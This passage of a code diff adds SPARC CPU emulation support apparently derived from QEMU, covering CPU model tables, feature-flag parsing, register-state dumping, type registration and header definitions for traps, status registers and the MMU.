+ 0x01000000, /* SuperSPARC 3.x, MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0x00000104, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 60", /* STP1020APGA */ + 0x40000000, /* SuperSPARC 3.x */ + 0 << 17, + 0x01000800, /* SuperSPARC 3.x, no MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc 61", + 0x44000000, /* SuperSPARC 3.x */ + 0 << 17, + 0x01000000, /* SuperSPARC 3.x, MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 0xffffffff, + 0xffffffff, + 0x00000104, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "TI SuperSparc II", + 0x40000000, /* SuperSPARC II 1.x */ + 0 << 17, + 0x08000000, /* SuperSPARC II 1.x, MXCC */ + 0x00002000, + 0xffffffc0, + 0x0000ffff, + 
0xffffffff, + 0xffffffff, + 0x00000104, + CPU_DEFAULT_FEATURES, + 8, + 0, + }, + { + "LEON2", + 0xf2000000, + 4 << 17, /* FPU version 4 (Meiko) */ + 0xf2000000, + 0x00004000, + 0x007ffff0, + 0x0000003f, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_TA0_SHUTDOWN, + 8, + 0, + }, + { + "LEON3", + 0xf3000000, + 4 << 17, /* FPU version 4 (Meiko) */ + 0xf3000000, + 0x00000000, + 0xfffffffc, + 0x000000ff, + 0xffffffff, + 0xffffffff, + 0, + CPU_DEFAULT_FEATURES | CPU_FEATURE_TA0_SHUTDOWN | + CPU_FEATURE_ASR17 | CPU_FEATURE_CACHE_CTRL | CPU_FEATURE_POWERDOWN | + CPU_FEATURE_CASA, + 8, + 0, + }, +#endif +}; + +static const char * const feature_name[] = { + "float", + "float128", + "swap", + "mul", + "div", + "flush", + "fsqrt", + "fmul", + "vis1", + "vis2", + "fsmuld", + "hypv", + "cmt", + "gl", +}; + +#if 0 +static void print_features(FILE *f, fprintf_function cpu_fprintf, + uint32_t features, const char *prefix) +{ + unsigned int i; + + for (i = 0; i < ARRAY_SIZE(feature_name); i++) { + if (feature_name[i] && (features & (1 << i))) { + if (prefix) { + (*cpu_fprintf)(f, "%s", prefix); + } + (*cpu_fprintf)(f, "%s ", feature_name[i]); + } + } +} +#endif + +static void add_flagname_to_bitmaps(const char *flagname, uint32_t *features) +{ + unsigned int i; + + for (i = 0; i < ARRAY_SIZE(feature_name); i++) { + if (feature_name[i] && !strcmp(flagname, feature_name[i])) { + *features |= 1 << i; + return; + } + } + //error_report("CPU feature %s not found", flagname); +} + +static int cpu_sparc_find_by_name(sparc_def_t *cpu_def, const char *name) +{ + unsigned int i; + const sparc_def_t *def = NULL; + + for (i = 0; i < ARRAY_SIZE(sparc_defs); i++) { + if (strcasecmp(name, sparc_defs[i].name) == 0) { + def = &sparc_defs[i]; + } + } + if (!def) { + return -1; + } + memcpy(cpu_def, def, sizeof(*def)); + return 0; +} + +static void sparc_cpu_parse_features(CPUState *cs, char *features, + Error **errp) +{ + SPARCCPU *cpu = SPARC_CPU(cs->uc, cs); + sparc_def_t 
*cpu_def = cpu->env.def; + char *featurestr; + uint32_t plus_features = 0; + uint32_t minus_features = 0; + uint64_t iu_version; + uint32_t fpu_version, mmu_version, nwindows; + + featurestr = features ? strtok(features, ",") : NULL; + while (featurestr) { + char *val; + + if (featurestr[0] == '+') { + add_flagname_to_bitmaps(featurestr + 1, &plus_features); + } else if (featurestr[0] == '-') { + add_flagname_to_bitmaps(featurestr + 1, &minus_features); + } else if ((val = strchr(featurestr, '='))) { + *val = 0; val++; + if (!strcmp(featurestr, "iu_version")) { + char *err; + + iu_version = strtoll(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + cpu_def->iu_version = iu_version; +#ifdef DEBUG_FEATURES + fprintf(stderr, "iu_version %" PRIx64 "\n", iu_version); +#endif + } else if (!strcmp(featurestr, "fpu_version")) { + char *err; + + fpu_version = strtol(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + cpu_def->fpu_version = fpu_version; +#ifdef DEBUG_FEATURES + fprintf(stderr, "fpu_version %x\n", fpu_version); +#endif + } else if (!strcmp(featurestr, "mmu_version")) { + char *err; + + mmu_version = strtol(val, &err, 0); + if (!*val || *err) { + error_setg(errp, "bad numerical value %s", val); + return; + } + cpu_def->mmu_version = mmu_version; +#ifdef DEBUG_FEATURES + fprintf(stderr, "mmu_version %x\n", mmu_version); +#endif + } else if (!strcmp(featurestr, "nwindows")) { + char *err; + + nwindows = strtol(val, &err, 0); + if (!*val || *err || nwindows > MAX_NWINDOWS || + nwindows < MIN_NWINDOWS) { + error_setg(errp, "bad numerical value %s", val); + return; + } + cpu_def->nwindows = nwindows; +#ifdef DEBUG_FEATURES + fprintf(stderr, "nwindows %d\n", nwindows); +#endif + } else { + error_setg(errp, "unrecognized feature %s", featurestr); + return; + } + } else { + error_setg(errp, "feature string `%s' not in format " + "(+feature|-feature|feature=xyz)", 
featurestr); + return; + } + featurestr = strtok(NULL, ","); + } + cpu_def->features |= plus_features; + cpu_def->features &= ~minus_features; +#ifdef DEBUG_FEATURES + print_features(stderr, fprintf, cpu_def->features, NULL); +#endif +} + +#if 0 +void sparc_cpu_list(FILE *f, fprintf_function cpu_fprintf) +{ + unsigned int i; + + for (i = 0; i < ARRAY_SIZE(sparc_defs); i++) { + (*cpu_fprintf)(f, "Sparc %16s IU " TARGET_FMT_lx + " FPU %08x MMU %08x NWINS %d ", + sparc_defs[i].name, + sparc_defs[i].iu_version, + sparc_defs[i].fpu_version, + sparc_defs[i].mmu_version, + sparc_defs[i].nwindows); + print_features(f, cpu_fprintf, CPU_DEFAULT_FEATURES & + ~sparc_defs[i].features, "-"); + print_features(f, cpu_fprintf, ~CPU_DEFAULT_FEATURES & + sparc_defs[i].features, "+"); + (*cpu_fprintf)(f, "\n"); + } + (*cpu_fprintf)(f, "Default CPU feature flags (use '-' to remove): "); + print_features(f, cpu_fprintf, CPU_DEFAULT_FEATURES, NULL); + (*cpu_fprintf)(f, "\n"); + (*cpu_fprintf)(f, "Available CPU feature flags (use '+' to add): "); + print_features(f, cpu_fprintf, ~CPU_DEFAULT_FEATURES, NULL); + (*cpu_fprintf)(f, "\n"); + (*cpu_fprintf)(f, "Numerical features (use '=' to set): iu_version " + "fpu_version mmu_version nwindows\n"); +} + +static void cpu_print_cc(FILE *f, fprintf_function cpu_fprintf, + uint32_t cc) +{ + cpu_fprintf(f, "%c%c%c%c", cc & PSR_NEG ? 'N' : '-', + cc & PSR_ZERO ? 'Z' : '-', cc & PSR_OVF ? 'V' : '-', + cc & PSR_CARRY ? 
'C' : '-'); +} + +#ifdef TARGET_SPARC64 +#define REGS_PER_LINE 4 +#else +#define REGS_PER_LINE 8 +#endif + +void sparc_cpu_dump_state(CPUState *cs, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + SPARCCPU *cpu = SPARC_CPU(cs); + CPUSPARCState *env = &cpu->env; + int i, x; + + cpu_fprintf(f, "pc: " TARGET_FMT_lx " npc: " TARGET_FMT_lx "\n", env->pc, + env->npc); + + for (i = 0; i < 8; i++) { + if (i % REGS_PER_LINE == 0) { + cpu_fprintf(f, "%%g%d-%d:", i, i + REGS_PER_LINE - 1); + } + cpu_fprintf(f, " " TARGET_FMT_lx, env->gregs[i]); + if (i % REGS_PER_LINE == REGS_PER_LINE - 1) { + cpu_fprintf(f, "\n"); + } + } + for (x = 0; x < 3; x++) { + for (i = 0; i < 8; i++) { + if (i % REGS_PER_LINE == 0) { + cpu_fprintf(f, "%%%c%d-%d: ", + x == 0 ? 'o' : (x == 1 ? 'l' : 'i'), + i, i + REGS_PER_LINE - 1); + } + cpu_fprintf(f, TARGET_FMT_lx " ", env->regwptr[i + x * 8]); + if (i % REGS_PER_LINE == REGS_PER_LINE - 1) { + cpu_fprintf(f, "\n"); + } + } + } + + for (i = 0; i < TARGET_DPREGS; i++) { + if ((i & 3) == 0) { + cpu_fprintf(f, "%%f%02d: ", i * 2); + } + cpu_fprintf(f, " %016" PRIx64, env->fpr[i].ll); + if ((i & 3) == 3) { + cpu_fprintf(f, "\n"); + } + } +#ifdef TARGET_SPARC64 + cpu_fprintf(f, "pstate: %08x ccr: %02x (icc: ", env->pstate, + (unsigned)cpu_get_ccr(env)); + cpu_print_cc(f, cpu_fprintf, cpu_get_ccr(env) << PSR_CARRY_SHIFT); + cpu_fprintf(f, " xcc: "); + cpu_print_cc(f, cpu_fprintf, cpu_get_ccr(env) << (PSR_CARRY_SHIFT - 4)); + cpu_fprintf(f, ") asi: %02x tl: %d pil: %x\n", env->asi, env->tl, + env->psrpil); + cpu_fprintf(f, "cansave: %d canrestore: %d otherwin: %d wstate: %d " + "cleanwin: %d cwp: %d\n", + env->cansave, env->canrestore, env->otherwin, env->wstate, + env->cleanwin, env->nwindows - 1 - env->cwp); + cpu_fprintf(f, "fsr: " TARGET_FMT_lx " y: " TARGET_FMT_lx " fprs: " + TARGET_FMT_lx "\n", env->fsr, env->y, env->fprs); +#else + cpu_fprintf(f, "psr: %08x (icc: ", cpu_get_psr(env)); + cpu_print_cc(f, cpu_fprintf, cpu_get_psr(env)); + 
/* Set the program counter.  On SPARC the next-PC register always trails
 * %pc by one instruction word, so %npc is kept at value + 4. */
static void sparc_cpu_set_pc(CPUState *cs, vaddr value)
{
    SPARCCPU *cpu = SPARC_CPU(cs->uc, cs);

    cpu->env.pc = value;
    cpu->env.npc = value + 4;
}

/* Resynchronize pc/npc after leaving a translation block.  The translator
 * stores npc in tb->cs_base (see cpu_get_tb_cpu_state in cpu.h). */
static void sparc_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb)
{
    SPARCCPU *cpu = SPARC_CPU(cs->uc, cs);

    cpu->env.pc = tb->pc;
    cpu->env.npc = tb->cs_base;
}

/* A hard interrupt is deliverable only when one is pending AND the
 * per-ISA interrupt-enable bit (PSR.ET / PSTATE.IE) is set. */
static bool sparc_cpu_has_work(CPUState *cs)
{
    SPARCCPU *cpu = SPARC_CPU(cs->uc, cs);
    CPUSPARCState *env = &cpu->env;

    return (cs->interrupt_request & CPU_INTERRUPT_HARD) &&
           cpu_interrupts_enabled(env);
}

/* Realize hook installed over the parent DeviceClass::realize in
 * sparc_cpu_class_init.  Starts the vCPU, then chains to the saved
 * parent realize.  Always returns 0; errors are reported via @errp. */
static int sparc_cpu_realizefn(struct uc_struct *uc, DeviceState *dev, Error **errp)
{
    SPARCCPUClass *scc = SPARC_CPU_GET_CLASS(uc, dev);
#if defined(CONFIG_USER_ONLY)
    SPARCCPU *cpu = SPARC_CPU(uc, dev);
    CPUSPARCState *env = &cpu->env;

    /* User-mode emulation: a CPU with any FPU also gets quad-precision
     * support (presumably because there is no kernel trap handler to
     * emulate it -- NOTE(review): confirm against upstream QEMU). */
    if ((env->def->features & CPU_FEATURE_FLOAT)) {
        env->def->features |= CPU_FEATURE_FLOAT128;
    }
#endif

    qemu_init_vcpu(CPU(dev));

    scc->parent_realize(uc, dev, errp);

    return 0;
}

/* Instance init: point the generic CPUState at our register file and
 * register with the exec core; under TCG also initialize the translator. */
static void sparc_cpu_initfn(struct uc_struct *uc, Object *obj, void *opaque)
{
    CPUState *cs = CPU(obj);
    SPARCCPU *cpu = SPARC_CPU(uc, obj);
    CPUSPARCState *env = &cpu->env;

    cs->env_ptr = env;
    cpu_exec_init(env, opaque);

    if (tcg_enabled(uc)) {
        gen_intermediate_code_init(env);
    }
}

/* Instance finalize: release the CPU model definition.  g_free(NULL)
 * is a safe no-op if env->def was never allocated. */
static void sparc_cpu_uninitfn(struct uc_struct *uc, Object *obj, void *opaque)
{
    SPARCCPU *cpu = SPARC_CPU(uc, obj);
    CPUSPARCState *env = &cpu->env;

    g_free(env->def);
}
/*
 * Register the SPARC CPU type with the QOM type system.  The TypeInfo
 * initializer below is positional; the annotations map each value to the
 * hook it most plausibly binds to, inferred from the value names --
 * NOTE(review): verify against this tree's TypeInfo declaration.
 */
void sparc_cpu_register_types(void *opaque)
{
    const TypeInfo sparc_cpu_type_info = {
        TYPE_SPARC_CPU,          /* type name */
        TYPE_CPU,                /* parent type name */

        sizeof(SPARCCPUClass),   /* class size */
        sizeof(SPARCCPU),        /* instance size */
        opaque,                  /* user data (the uc_struct) handed to hooks */

        sparc_cpu_initfn,        /* instance init */
        NULL,
        sparc_cpu_uninitfn,      /* instance finalize */

        NULL,

        sparc_cpu_class_init,    /* class init */
        NULL,
        NULL,

        false,                   /* presumably "abstract" -- confirm */
    };

    //printf(">>> sparc_cpu_register_types\n");
    type_register_static(opaque, &sparc_cpu_type_info);
}
41 +# ifdef TARGET_ABI32 +# define TARGET_VIRT_ADDR_SPACE_BITS 32 +# else +# define TARGET_VIRT_ADDR_SPACE_BITS 44 +# endif +#endif + +#define CPUArchState struct CPUSPARCState + +#include "exec/cpu-defs.h" + +#include "fpu/softfloat.h" + +#define TARGET_HAS_ICE 1 + +#if !defined(TARGET_SPARC64) +#define ELF_MACHINE EM_SPARC +#else +#define ELF_MACHINE EM_SPARCV9 +#endif + +/*#define EXCP_INTERRUPT 0x100*/ + +/* trap definitions */ +#ifndef TARGET_SPARC64 +#define TT_TFAULT 0x01 +#define TT_ILL_INSN 0x02 +#define TT_PRIV_INSN 0x03 +#define TT_NFPU_INSN 0x04 +#define TT_WIN_OVF 0x05 +#define TT_WIN_UNF 0x06 +#define TT_UNALIGNED 0x07 +#define TT_FP_EXCP 0x08 +#define TT_DFAULT 0x09 +#define TT_TOVF 0x0a +#define TT_EXTINT 0x10 +#define TT_CODE_ACCESS 0x21 +#define TT_UNIMP_FLUSH 0x25 +#define TT_DATA_ACCESS 0x29 +#define TT_DIV_ZERO 0x2a +#define TT_NCP_INSN 0x24 +#define TT_TRAP 0x80 +#else +#define TT_POWER_ON_RESET 0x01 +#define TT_TFAULT 0x08 +#define TT_CODE_ACCESS 0x0a +#define TT_ILL_INSN 0x10 +#define TT_UNIMP_FLUSH TT_ILL_INSN +#define TT_PRIV_INSN 0x11 +#define TT_NFPU_INSN 0x20 +#define TT_FP_EXCP 0x21 +#define TT_TOVF 0x23 +#define TT_CLRWIN 0x24 +#define TT_DIV_ZERO 0x28 +#define TT_DFAULT 0x30 +#define TT_DATA_ACCESS 0x32 +#define TT_UNALIGNED 0x34 +#define TT_PRIV_ACT 0x37 +#define TT_EXTINT 0x40 +#define TT_IVEC 0x60 +#define TT_TMISS 0x64 +#define TT_DMISS 0x68 +#define TT_DPROT 0x6c +#define TT_SPILL 0x80 +#define TT_FILL 0xc0 +#define TT_WOTHER (1 << 5) +#define TT_TRAP 0x100 +#endif + +#define PSR_NEG_SHIFT 23 +#define PSR_NEG (1 << PSR_NEG_SHIFT) +#define PSR_ZERO_SHIFT 22 +#define PSR_ZERO (1 << PSR_ZERO_SHIFT) +#define PSR_OVF_SHIFT 21 +#define PSR_OVF (1 << PSR_OVF_SHIFT) +#define PSR_CARRY_SHIFT 20 +#define PSR_CARRY (1 << PSR_CARRY_SHIFT) +#define PSR_ICC (PSR_NEG|PSR_ZERO|PSR_OVF|PSR_CARRY) +#if !defined(TARGET_SPARC64) +#define PSR_EF (1<<12) +#define PSR_PIL 0xf00 +#define PSR_S (1<<7) +#define PSR_PS (1<<6) +#define PSR_ET (1<<5) 
+#define PSR_CWP 0x1f +#endif + +#define CC_SRC (env->cc_src) +#define CC_SRC2 (env->cc_src2) +#define CC_DST (env->cc_dst) +#define CC_OP (env->cc_op) + +enum { + CC_OP_DYNAMIC, /* must use dynamic code to get cc_op */ + CC_OP_FLAGS, /* all cc are back in status register */ + CC_OP_DIV, /* modify N, Z and V, C = 0*/ + CC_OP_ADD, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_ADDX, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_TADD, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_TADDTV, /* modify all flags except V, CC_DST = res, CC_SRC = src1 */ + CC_OP_SUB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_SUBX, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_TSUB, /* modify all flags, CC_DST = res, CC_SRC = src1 */ + CC_OP_TSUBTV, /* modify all flags except V, CC_DST = res, CC_SRC = src1 */ + CC_OP_LOGIC, /* modify N and Z, C = V = 0, CC_DST = res */ + CC_OP_NB, +}; + +/* Trap base register */ +#define TBR_BASE_MASK 0xfffff000 + +#if defined(TARGET_SPARC64) +#define PS_TCT (1<<12) /* UA2007, impl.dep. 
trap on control transfer */ +#define PS_IG (1<<11) /* v9, zero on UA2007 */ +#define PS_MG (1<<10) /* v9, zero on UA2007 */ +#define PS_CLE (1<<9) /* UA2007 */ +#define PS_TLE (1<<8) /* UA2007 */ +#define PS_RMO (1<<7) +#define PS_RED (1<<5) /* v9, zero on UA2007 */ +#define PS_PEF (1<<4) /* enable fpu */ +#define PS_AM (1<<3) /* address mask */ +#define PS_PRIV (1<<2) +#define PS_IE (1<<1) +#define PS_AG (1<<0) /* v9, zero on UA2007 */ + +#define FPRS_FEF (1<<2) + +#define HS_PRIV (1<<2) +#endif + +/* Fcc */ +#define FSR_RD1 (1ULL << 31) +#define FSR_RD0 (1ULL << 30) +#define FSR_RD_MASK (FSR_RD1 | FSR_RD0) +#define FSR_RD_NEAREST 0 +#define FSR_RD_ZERO FSR_RD0 +#define FSR_RD_POS FSR_RD1 +#define FSR_RD_NEG (FSR_RD1 | FSR_RD0) + +#define FSR_NVM (1ULL << 27) +#define FSR_OFM (1ULL << 26) +#define FSR_UFM (1ULL << 25) +#define FSR_DZM (1ULL << 24) +#define FSR_NXM (1ULL << 23) +#define FSR_TEM_MASK (FSR_NVM | FSR_OFM | FSR_UFM | FSR_DZM | FSR_NXM) + +#define FSR_NVA (1ULL << 9) +#define FSR_OFA (1ULL << 8) +#define FSR_UFA (1ULL << 7) +#define FSR_DZA (1ULL << 6) +#define FSR_NXA (1ULL << 5) +#define FSR_AEXC_MASK (FSR_NVA | FSR_OFA | FSR_UFA | FSR_DZA | FSR_NXA) + +#define FSR_NVC (1ULL << 4) +#define FSR_OFC (1ULL << 3) +#define FSR_UFC (1ULL << 2) +#define FSR_DZC (1ULL << 1) +#define FSR_NXC (1ULL << 0) +#define FSR_CEXC_MASK (FSR_NVC | FSR_OFC | FSR_UFC | FSR_DZC | FSR_NXC) + +#define FSR_FTT2 (1ULL << 16) +#define FSR_FTT1 (1ULL << 15) +#define FSR_FTT0 (1ULL << 14) +//gcc warns about constant overflow for ~FSR_FTT_MASK +//#define FSR_FTT_MASK (FSR_FTT2 | FSR_FTT1 | FSR_FTT0) +#ifdef TARGET_SPARC64 +#define FSR_FTT_NMASK 0xfffffffffffe3fffULL +#define FSR_FTT_CEXC_NMASK 0xfffffffffffe3fe0ULL +#define FSR_LDFSR_OLDMASK 0x0000003f000fc000ULL +#define FSR_LDXFSR_MASK 0x0000003fcfc00fffULL +#define FSR_LDXFSR_OLDMASK 0x00000000000fc000ULL +#else +#define FSR_FTT_NMASK 0xfffe3fffULL +#define FSR_FTT_CEXC_NMASK 0xfffe3fe0ULL +#define FSR_LDFSR_OLDMASK 
0x000fc000ULL +#endif +#define FSR_LDFSR_MASK 0xcfc00fffULL +#define FSR_FTT_IEEE_EXCP (1ULL << 14) +#define FSR_FTT_UNIMPFPOP (3ULL << 14) +#define FSR_FTT_SEQ_ERROR (4ULL << 14) +#define FSR_FTT_INVAL_FPR (6ULL << 14) + +#define FSR_FCC1_SHIFT 11 +#define FSR_FCC1 (1ULL << FSR_FCC1_SHIFT) +#define FSR_FCC0_SHIFT 10 +#define FSR_FCC0 (1ULL << FSR_FCC0_SHIFT) + +/* MMU */ +#define MMU_E (1<<0) +#define MMU_NF (1<<1) + +#define PTE_ENTRYTYPE_MASK 3 +#define PTE_ACCESS_MASK 0x1c +#define PTE_ACCESS_SHIFT 2 +#define PTE_PPN_SHIFT 7 +#define PTE_ADDR_MASK 0xffffff00 + +#define PG_ACCESSED_BIT 5 +#define PG_MODIFIED_BIT 6 +#define PG_CACHE_BIT 7 + +#define PG_ACCESSED_MASK (1 << PG_ACCESSED_BIT) +#define PG_MODIFIED_MASK (1 << PG_MODIFIED_BIT) +#define PG_CACHE_MASK (1 << PG_CACHE_BIT) + +/* 3 <= NWINDOWS <= 32. */ +#define MIN_NWINDOWS 3 +#define MAX_NWINDOWS 32 + +#if !defined(TARGET_SPARC64) +#define NB_MMU_MODES 2 +#else +#define NB_MMU_MODES 6 +typedef struct trap_state { + uint64_t tpc; + uint64_t tnpc; + uint64_t tstate; + uint32_t tt; +} trap_state; +#endif + +typedef struct sparc_def_t { + const char *name; + target_ulong iu_version; + uint32_t fpu_version; + uint32_t mmu_version; + uint32_t mmu_bm; + uint32_t mmu_ctpr_mask; + uint32_t mmu_cxr_mask; + uint32_t mmu_sfsr_mask; + uint32_t mmu_trcr_mask; + uint32_t mxcc_version; + uint32_t features; + uint32_t nwindows; + uint32_t maxtl; +} sparc_def_t; + +#define CPU_FEATURE_FLOAT (1 << 0) +#define CPU_FEATURE_FLOAT128 (1 << 1) +#define CPU_FEATURE_SWAP (1 << 2) +#define CPU_FEATURE_MUL (1 << 3) +#define CPU_FEATURE_DIV (1 << 4) +#define CPU_FEATURE_FLUSH (1 << 5) +#define CPU_FEATURE_FSQRT (1 << 6) +#define CPU_FEATURE_FMUL (1 << 7) +#define CPU_FEATURE_VIS1 (1 << 8) +#define CPU_FEATURE_VIS2 (1 << 9) +#define CPU_FEATURE_FSMULD (1 << 10) +#define CPU_FEATURE_HYPV (1 << 11) +#define CPU_FEATURE_CMT (1 << 12) +#define CPU_FEATURE_GL (1 << 13) +#define CPU_FEATURE_TA0_SHUTDOWN (1 << 14) /* Shutdown on "ta 0x0" */ 
+#define CPU_FEATURE_ASR17 (1 << 15) +#define CPU_FEATURE_CACHE_CTRL (1 << 16) +#define CPU_FEATURE_POWERDOWN (1 << 17) +#define CPU_FEATURE_CASA (1 << 18) + +#ifndef TARGET_SPARC64 +#define CPU_DEFAULT_FEATURES (CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | \ + CPU_FEATURE_MUL | CPU_FEATURE_DIV | \ + CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | \ + CPU_FEATURE_FMUL | CPU_FEATURE_FSMULD) +#else +#define CPU_DEFAULT_FEATURES (CPU_FEATURE_FLOAT | CPU_FEATURE_SWAP | \ + CPU_FEATURE_MUL | CPU_FEATURE_DIV | \ + CPU_FEATURE_FLUSH | CPU_FEATURE_FSQRT | \ + CPU_FEATURE_FMUL | CPU_FEATURE_VIS1 | \ + CPU_FEATURE_VIS2 | CPU_FEATURE_FSMULD | \ + CPU_FEATURE_CASA) +enum { + mmu_us_12, // Ultrasparc < III (64 entry TLB) + mmu_us_3, // Ultrasparc III (512 entry TLB) + mmu_us_4, // Ultrasparc IV (several TLBs, 32 and 256MB pages) + mmu_sun4v, // T1, T2 +}; +#endif + +#define TTE_VALID_BIT (1ULL << 63) +#define TTE_NFO_BIT (1ULL << 60) +#define TTE_USED_BIT (1ULL << 41) +#define TTE_LOCKED_BIT (1ULL << 6) +#define TTE_SIDEEFFECT_BIT (1ULL << 3) +#define TTE_PRIV_BIT (1ULL << 2) +#define TTE_W_OK_BIT (1ULL << 1) +#define TTE_GLOBAL_BIT (1ULL << 0) + +#define TTE_IS_VALID(tte) ((tte) & TTE_VALID_BIT) +#define TTE_IS_NFO(tte) ((tte) & TTE_NFO_BIT) +#define TTE_IS_USED(tte) ((tte) & TTE_USED_BIT) +#define TTE_IS_LOCKED(tte) ((tte) & TTE_LOCKED_BIT) +#define TTE_IS_SIDEEFFECT(tte) ((tte) & TTE_SIDEEFFECT_BIT) +#define TTE_IS_PRIV(tte) ((tte) & TTE_PRIV_BIT) +#define TTE_IS_W_OK(tte) ((tte) & TTE_W_OK_BIT) +#define TTE_IS_GLOBAL(tte) ((tte) & TTE_GLOBAL_BIT) + +#define TTE_SET_USED(tte) ((tte) |= TTE_USED_BIT) +#define TTE_SET_UNUSED(tte) ((tte) &= ~TTE_USED_BIT) + +#define TTE_PGSIZE(tte) (((tte) >> 61) & 3ULL) +#define TTE_PA(tte) ((tte) & 0x1ffffffe000ULL) + +#define SFSR_NF_BIT (1ULL << 24) /* JPS1 NoFault */ +#define SFSR_TM_BIT (1ULL << 15) /* JPS1 TLB Miss */ +#define SFSR_FT_VA_IMMU_BIT (1ULL << 13) /* USIIi VA out of range (IMMU) */ +#define SFSR_FT_VA_DMMU_BIT (1ULL << 12) /* USIIi VA out 
of range (DMMU) */ +#define SFSR_FT_NFO_BIT (1ULL << 11) /* NFO page access */ +#define SFSR_FT_ILL_BIT (1ULL << 10) /* illegal LDA/STA ASI */ +#define SFSR_FT_ATOMIC_BIT (1ULL << 9) /* atomic op on noncacheable area */ +#define SFSR_FT_NF_E_BIT (1ULL << 8) /* NF access on side effect area */ +#define SFSR_FT_PRIV_BIT (1ULL << 7) /* privilege violation */ +#define SFSR_PR_BIT (1ULL << 3) /* privilege mode */ +#define SFSR_WRITE_BIT (1ULL << 2) /* write access mode */ +#define SFSR_OW_BIT (1ULL << 1) /* status overwritten */ +#define SFSR_VALID_BIT (1ULL << 0) /* status valid */ + +#define SFSR_ASI_SHIFT 16 /* 23:16 ASI value */ +#define SFSR_ASI_MASK (0xffULL << SFSR_ASI_SHIFT) +#define SFSR_CT_PRIMARY (0ULL << 4) /* 5:4 context type */ +#define SFSR_CT_SECONDARY (1ULL << 4) +#define SFSR_CT_NUCLEUS (2ULL << 4) +#define SFSR_CT_NOTRANS (3ULL << 4) +#define SFSR_CT_MASK (3ULL << 4) + +/* Leon3 cache control */ + +/* Cache control: emulate the behavior of cache control registers but without + any effect on the emulated */ + +#define CACHE_STATE_MASK 0x3 +#define CACHE_DISABLED 0x0 +#define CACHE_FROZEN 0x1 +#define CACHE_ENABLED 0x3 + +/* Cache Control register fields */ + +#define CACHE_CTRL_IF (1 << 4) /* Instruction Cache Freeze on Interrupt */ +#define CACHE_CTRL_DF (1 << 5) /* Data Cache Freeze on Interrupt */ +#define CACHE_CTRL_DP (1 << 14) /* Data cache flush pending */ +#define CACHE_CTRL_IP (1 << 15) /* Instruction cache flush pending */ +#define CACHE_CTRL_IB (1 << 16) /* Instruction burst fetch */ +#define CACHE_CTRL_FI (1 << 21) /* Flush Instruction cache (Write only) */ +#define CACHE_CTRL_FD (1 << 22) /* Flush Data cache (Write only) */ +#define CACHE_CTRL_DS (1 << 23) /* Data cache snoop enable */ + +typedef struct SparcTLBEntry { + uint64_t tag; + uint64_t tte; +} SparcTLBEntry; + +struct CPUTimer +{ + const char *name; + uint32_t frequency; + uint32_t disabled; + uint64_t disabled_mask; + int64_t clock_offset; + QEMUTimer *qtimer; +}; + +typedef 
struct CPUTimer CPUTimer; + +struct QEMUFile; +void cpu_put_timer(struct QEMUFile *f, CPUTimer *s); +void cpu_get_timer(struct QEMUFile *f, CPUTimer *s); + +typedef struct CPUSPARCState CPUSPARCState; + +struct CPUSPARCState { + target_ulong gregs[8]; /* general registers */ + target_ulong *regwptr; /* pointer to current register window */ + target_ulong pc; /* program counter */ + target_ulong npc; /* next program counter */ + target_ulong y; /* multiply/divide register */ + + /* emulator internal flags handling */ + target_ulong cc_src, cc_src2; + target_ulong cc_dst; + uint32_t cc_op; + + target_ulong cond; /* conditional branch result (XXX: save it in a + temporary register when possible) */ + + uint32_t psr; /* processor state register */ + target_ulong fsr; /* FPU state register */ + CPU_DoubleU fpr[TARGET_DPREGS]; /* floating point registers */ + uint32_t cwp; /* index of current register window (extracted + from PSR) */ +#if !defined(TARGET_SPARC64) || defined(TARGET_ABI32) + uint32_t wim; /* window invalid mask */ +#endif + target_ulong tbr; /* trap base register */ +#if !defined(TARGET_SPARC64) + int psrs; /* supervisor mode (extracted from PSR) */ + int psrps; /* previous supervisor mode */ + int psret; /* enable traps */ +#endif + uint32_t psrpil; /* interrupt blocking level */ + uint32_t pil_in; /* incoming interrupt level bitmap */ +#if !defined(TARGET_SPARC64) + int psref; /* enable fpu */ +#endif + int interrupt_index; + /* NOTE: we allow 8 more registers to handle wrapping */ + target_ulong regbase[MAX_NWINDOWS * 16 + 8]; + + CPU_COMMON + + /* Fields from here on are preserved across CPU reset. 
*/ + target_ulong version; + uint32_t nwindows; + + /* MMU regs */ +#if defined(TARGET_SPARC64) + uint64_t lsu; +#define DMMU_E 0x8 +#define IMMU_E 0x4 + //typedef struct SparcMMU + union { + uint64_t immuregs[16]; + struct { + uint64_t tsb_tag_target; + uint64_t unused_mmu_primary_context; // use DMMU + uint64_t unused_mmu_secondary_context; // use DMMU + uint64_t sfsr; + uint64_t sfar; + uint64_t tsb; + uint64_t tag_access; + } immu; + }; + union { + uint64_t dmmuregs[16]; + struct { + uint64_t tsb_tag_target; + uint64_t mmu_primary_context; + uint64_t mmu_secondary_context; + uint64_t sfsr; + uint64_t sfar; + uint64_t tsb; + uint64_t tag_access; + } dmmu; + }; + SparcTLBEntry itlb[64]; + SparcTLBEntry dtlb[64]; + uint32_t mmu_version; +#else + uint32_t mmuregs[32]; + uint64_t mxccdata[4]; + uint64_t mxccregs[8]; + uint32_t mmubpctrv, mmubpctrc, mmubpctrs; + uint64_t mmubpaction; + uint64_t mmubpregs[4]; + uint64_t prom_addr; +#endif + /* temporary float registers */ + float128 qt0, qt1; + float_status fp_status; +#if defined(TARGET_SPARC64) +#define 